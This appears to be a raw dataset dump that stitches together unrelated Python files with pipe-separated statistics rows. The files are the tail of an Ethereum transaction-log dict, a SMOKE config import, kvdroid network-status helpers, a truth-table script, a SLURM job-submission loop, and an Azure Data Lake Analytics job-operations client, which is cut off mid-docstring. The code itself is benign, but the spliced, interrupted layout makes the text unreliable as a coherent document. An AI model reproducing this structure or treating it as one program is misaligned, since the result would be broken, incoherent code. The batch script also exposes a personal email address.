"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2",
"logIndex": 147,
"data": "0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2",
"logIndex": 148,
"data": "0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8",
"removed": False,
"topics": [
HexBytes("0x7fcf532c15f0a6db0bd6d0e038bea71d30d808c7d98cb3bf7268a95bf5081b65"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5",
"logIndex": 149,
"data": "0x00000000000000000000000000000000000000000000000000086079fb32a6440000000000000000000000000000000000000000000000000e74838b38dfff90000000000000000000000000000000000000000000000ad7de5bcfee7eb6d2da",
"removed": False,
"topics": [
HexBytes("0x875352fb3fadeb8c0be7cbbe8ff761b308fa7033470cd0287f02f3436fd76cb9")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xc00e94Cb662C3520282E6f5717214004A7f26888",
"logIndex": 150,
"data": "0x000000000000000000000000000000000000000000000000008bd386c2ed4798",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x0000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B",
"logIndex": 151,
"data": "0x000000000000000000000000000000000000000000000000008bd386c2ed479800000000000000000000000000000b68525e31895cf9cf5c67d3bdec9b7aef76",
"removed": False,
"topics": [
HexBytes("0x2caecd17d02f56fa897705dcc740da2d237c373f70686f4e0d9bd3bf0400ea7a"),
HexBytes("0x0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5",
"logIndex": 152,
"data": "0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc800000000000000000000000000000000000000000000000000000033a46a6672",
"removed": False,
"topics": [
HexBytes("0x4c209b5fc8ad50758f13e2e1088ba56a560dff690a1c6fef26394f4c03821c4f")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5",
"logIndex": 153,
"data": "0x00000000000000000000000000000000000000000000000000000033a46a6672",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x5c55B921f590a89C1Ebe84dF170E655a82b62126",
"logIndex": 154,
"data": "0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000051c0620400000000000000000000000000000000000000000000000026883ed3bd1302bc8000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7",
"removed": False,
"topics": [
HexBytes("0xa21bd02d37a839b5f9b81157b445649b4115e939611690d8a93b46bdb035a664"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"),
HexBytes("0x66688ffd4cb9146843859636430609f5de9141fe8f1ea0544ac5932d715436ef"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
],
"nonce": 1153,
"receiver": "0xF14f0648435CF34f8bC800d4E71FF0Ba15bC52dD",
"required_confirmations": 0,
"sender": "0x5668EAd1eDB8E2a4d724C8fb9cB5fFEabEB422dc",
"status": TransactionStatusEnum.NO_ERROR,
"txn_hash": "0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32",
"value": 20160000000000000,
}
| 75.767464
| 10,939
| 0.471223
| 7,770
| 237,531
| 14.326641
| 0.091377
| 0.116747
| 0.169946
| 0.219695
| 0.60717
| 0.603919
| 0.595807
| 0.564841
| 0.550755
| 0.548555
| 0
| 0.564434
| 0.470995
| 237,531
| 3,134
| 10,940
| 75.79164
| 0.321468
| 0.000042
| 0
| 0.776501
| 0
| 0.000958
| 0.41584
| 0.348642
| 0
| 1
| 0.311377
| 0
| 0
| 1
| 0
| false
| 0
| 0.001277
| 0
| 0.001277
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac3eed2a0f1b9b134fe546ec71b71a96c23079f0
| 85
|
py
|
Python
|
smoke/config/__init__.py
|
dashidhy/SMOKE
|
724876443db90bbdca8f942515e881993b3f47b2
|
[
"MIT"
] | 5
|
2020-08-28T23:38:39.000Z
|
2020-08-31T17:00:56.000Z
|
smoke/config/__init__.py
|
Jike-u/SMOKE
|
724876443db90bbdca8f942515e881993b3f47b2
|
[
"MIT"
] | null | null | null |
smoke/config/__init__.py
|
Jike-u/SMOKE
|
724876443db90bbdca8f942515e881993b3f47b2
|
[
"MIT"
] | 3
|
2020-08-28T23:51:34.000Z
|
2021-04-18T03:32:39.000Z
|
from .defaults_kitti import _C as cfg_kitti
from .defaults_nusc import _C as cfg_nusc
| 42.5
| 43
| 0.847059
| 16
| 85
| 4.125
| 0.5
| 0.363636
| 0.272727
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129412
| 85
| 2
| 44
| 42.5
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3bb6c1a166bef5ff6590728e58cdfd2b3592a070
| 1,250
|
py
|
Python
|
kvdroid/tools/network.py
|
kengoon/Kvdroid
|
a47ab614079b70f81031c2e16a2a04fba1d39677
|
[
"MIT"
] | 1
|
2021-03-23T08:04:22.000Z
|
2021-03-23T08:04:22.000Z
|
kvdroid/tools/network.py
|
kengoon/Kvdroid
|
a47ab614079b70f81031c2e16a2a04fba1d39677
|
[
"MIT"
] | null | null | null |
kvdroid/tools/network.py
|
kengoon/Kvdroid
|
a47ab614079b70f81031c2e16a2a04fba1d39677
|
[
"MIT"
] | null | null | null |
from kvdroid.jclass.android import Activity
from kvdroid import activity
def network_status():
from kvdroid.jclass.android import ConnectivityManager
ConnectivityManager = ConnectivityManager()
con_mgr = activity.getSystemService(Activity().CONNECTIVITY_SERVICE)
try:
return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_WIFI).isConnectedOrConnecting()
except:
try:
return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_MOBILE).isConnectedOrConnecting()
except:
return False
def wifi_status():
from kvdroid.jclass.android import ConnectivityManager
ConnectivityManager = ConnectivityManager()
con_mgr = activity.getSystemService(Activity().CONNECTIVITY_SERVICE)
try:
return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_WIFI).isConnectedOrConnecting()
except:
return False
def mobile_status():
from kvdroid.jclass.android import ConnectivityManager
ConnectivityManager = ConnectivityManager()
con_mgr = activity.getSystemService(Activity().CONNECTIVITY_SERVICE)
try:
return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_MOBILE).isConnectedOrConnecting()
except:
return False
| 36.764706
| 100
| 0.7464
| 110
| 1,250
| 8.327273
| 0.218182
| 0.045852
| 0.074236
| 0.104803
| 0.94214
| 0.89083
| 0.89083
| 0.89083
| 0.89083
| 0.89083
| 0
| 0
| 0.1872
| 1,250
| 33
| 101
| 37.878788
| 0.901575
| 0
| 0
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.172414
| 0
| 0.517241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
3bf39160d270e85b87c028a1a56b4c833f35561e
| 4,337
|
py
|
Python
|
3-semester/programming/lab3.py
|
Rakleed/rgpu
|
47ab2a05a8398c15be7e41e9e98fafe5c2a36627
|
[
"MIT"
] | null | null | null |
3-semester/programming/lab3.py
|
Rakleed/rgpu
|
47ab2a05a8398c15be7e41e9e98fafe5c2a36627
|
[
"MIT"
] | null | null | null |
3-semester/programming/lab3.py
|
Rakleed/rgpu
|
47ab2a05a8398c15be7e41e9e98fafe5c2a36627
|
[
"MIT"
] | null | null | null |
"""
Автор: Моисеенко Павел, группа № 1, подгруппа № 2.
Задание: вывести таблицу истинности для and, or, xor, equality.
Таблица введена с помощью символа "*", int и bool преведены к строкам, и выведены результаты для коньюнкции, дизюнкции, строгой дизъюнкции и эквиваленции.
"""
logical_false = 0
logical_true = 1
delimiter = "*"
space_symbol = " "
header = "* A *" + "* B *" + "* " + " A and B " + "*"
table_width = len(header)
# print (logical_A and logical_B)
print(delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) and bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) and bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) and bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) and bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
header = "* A *" + "* B *" + "* " + " A or B " + "*"
# print (logical_A or logical_B)
print("\n" + delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) or bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) or bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) or bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) or bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
header = "* A *" + "* B *" + "* " + " A xor B " + "*"
# print (logical_A xor logical_B)
print("\n" + delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) ^ bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) ^ bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) ^ bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) ^ bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
header = "* A *" + "* B *" + "* " + " A == B " + "*"
# print (logical_A == logical_B)
print("\n" + delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) is bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) is bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) is bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) is bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
| 34.696
| 158
| 0.611944
| 553
| 4,337
| 4.567812
| 0.103074
| 0.15677
| 0.180523
| 0.199525
| 0.852336
| 0.852336
| 0.852336
| 0.852336
| 0.841251
| 0.841251
| 0
| 0.010161
| 0.183076
| 4,337
| 124
| 159
| 34.975806
| 0.701665
| 0.091769
| 0
| 0.705882
| 0
| 0
| 0.085313
| 0
| 0.047059
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.517647
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
ce314602c07ee9296c566b5ad7d82c1855a5da59
| 8,004
|
py
|
Python
|
cluster/submit_firas.py
|
andrea0292/Dark-Photon-Perturbations
|
7b54172176da5629b200b0bc5f8e93e7407c5a8d
|
[
"MIT"
] | 1
|
2020-08-24T22:20:46.000Z
|
2020-08-24T22:20:46.000Z
|
cluster/submit_firas.py
|
andrea0292/Dark-Photon-Perturbations
|
7b54172176da5629b200b0bc5f8e93e7407c5a8d
|
[
"MIT"
] | null | null | null |
cluster/submit_firas.py
|
andrea0292/Dark-Photon-Perturbations
|
7b54172176da5629b200b0bc5f8e93e7407c5a8d
|
[
"MIT"
] | 1
|
2021-04-21T09:21:21.000Z
|
2021-04-21T09:21:21.000Z
|
import sys, os
import random
import numpy as np
sys.path.append("../")
from grf.units import *
batch='''#!/bin/bash
#SBATCH -N 1 # node count
#SBATCH --ntasks-per-node=1
#SBATCH -t 10:00:00
#SBATCH --mem=4GB
##SBATCH --mail-type=begin
##SBATCH --mail-type=end
##SBATCH --mail-user=sm8383@nyu.edu
cd /home/sm8383/spectral_distortions_perturbations/cluster
conda activate
'''
# Main set of plots
for pdf in ["gaussian", "lognormal", "log_analytic_pdf_interp"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [-1, 1e2, 1e4]:
for z_min in [1e-3, 20]:
for z_excise_max in [20, 30]:
for b in [1, 1.5]:
for pixie in [0, 1]:
if (b != 1) and pdf is not "lognormal":
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf is "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Homogeneous plots
for pixie in [0, 1]:
tag = "homo_pixie_" + str(pixie)
batchn = batch + "\n"
batchn += "python firas_interface.py --homo 1 --tag " + tag + " --pixie " + str(pixie)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run voids
for pdf in ["voids"]:
for pspec_tag in ["franken_lower"]:
for one_plus_delta_bound in [-1, 1e2]:
for z_min in [1e-3, 20]:
for z_excise_max in [20, 30]:
for b in [1]:
for pixie in [0]:
if (b != 1) and pdf is not "lognormal":
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf is "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run more 1 + delta cuts
for pdf in ["lognormal", "log_analytic_pdf_interp"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [10, 1e3, 1e5]:
for z_min in [1e-3]:
for z_excise_max in [20]:
for b in [1]:
for pixie in [0]:
if (b != 1) and pdf is not "lognormal":
continue
if (pspec_tag == "franken_upper") and (pdf == "log_analytic_pdf_interp"):
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf is "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run more z_min values
for pdf in ["lognormal"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [1e2]:
for z_min in [1e-3, 1e-2, 1e-1, 1]:
for z_excise_max in [20]:
for b in [1]:
for pixie in [0]:
if (b != 1) and pdf is not "lognormal":
continue
if (pspec_tag == "franken_upper") and (pdf == "log_analytic_pdf_interp"):
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf is "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run over a wider mass
for pdf in ["lognormal"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [1e2]:
for z_min in [1e-3, 20]:
for z_excise_max in [20]:
for b in [1]:
for pixie in [0, 1]:
if (b != 1) and pdf is not "lognormal":
continue
tag = "widemass_1_pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf is "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --widemass 1 --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
| 46.265896
| 310
| 0.444528
| 919
| 8,004
| 3.5963
| 0.125136
| 0.031467
| 0.075643
| 0.102874
| 0.861725
| 0.858094
| 0.846899
| 0.846899
| 0.826626
| 0.826626
| 0
| 0.020598
| 0.423788
| 8,004
| 173
| 311
| 46.265896
| 0.69601
| 0.014118
| 0
| 0.769231
| 0
| 0
| 0.220066
| 0.035895
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030769
| 0
| 0.030769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce404d09af046ff8cc5e92c1bf55a3f774d27bb9
| 34,735
|
py
|
Python
|
sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/operations/job_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/operations/job_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/operations/job_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class JobOperations(object):
"""JobOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-09-01-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-09-01-preview"
self.config = config
def list(
self, account_name, filter=None, top=None, skip=None, select=None, orderby=None, count=None, custom_headers=None, raw=False, **operation_config):
"""Lists the jobs, if any, associated with the specified Data Lake
Analytics account. The response includes a link to the next page of
results, if any.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param filter: OData filter. Optional.
:type filter: str
:param top: The number of items to return. Optional.
:type top: int
:param skip: The number of items to skip over before returning
elements. Optional.
:type skip: int
:param select: OData Select statement. Limits the properties on each
entry to just those requested, e.g.
Categories?$select=CategoryName,Description. Optional.
:type select: str
:param orderby: OrderBy clause. One or more comma-separated
expressions with an optional "asc" (the default) or "desc" depending
on the order you'd like the values sorted, e.g.
Categories?$orderby=CategoryName desc. Optional.
:type orderby: str
:param count: The Boolean value of true or false to request a count of
the matching resources included with the resources in the response,
e.g. Categories?$count=true. Optional.
:type count: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of JobInformationBasic
:rtype:
~azure.mgmt.datalake.analytics.job.models.JobInformationBasicPaged[~azure.mgmt.datalake.analytics.job.models.JobInformationBasic]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int', minimum=1)
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int', minimum=1)
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, 'str')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if count is not None:
query_parameters['$count'] = self._serialize.query("count", count, 'bool')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.JobInformationBasicPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.JobInformationBasicPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/jobs'}
def create(
self, account_name, job_identity, parameters, custom_headers=None, raw=False, **operation_config):
"""Submits a job to the specified Data Lake Analytics account.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param parameters: The parameters to submit a job.
:type parameters:
~azure.mgmt.datalake.analytics.job.models.CreateJobParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobInformation or ClientRawResponse if raw=true
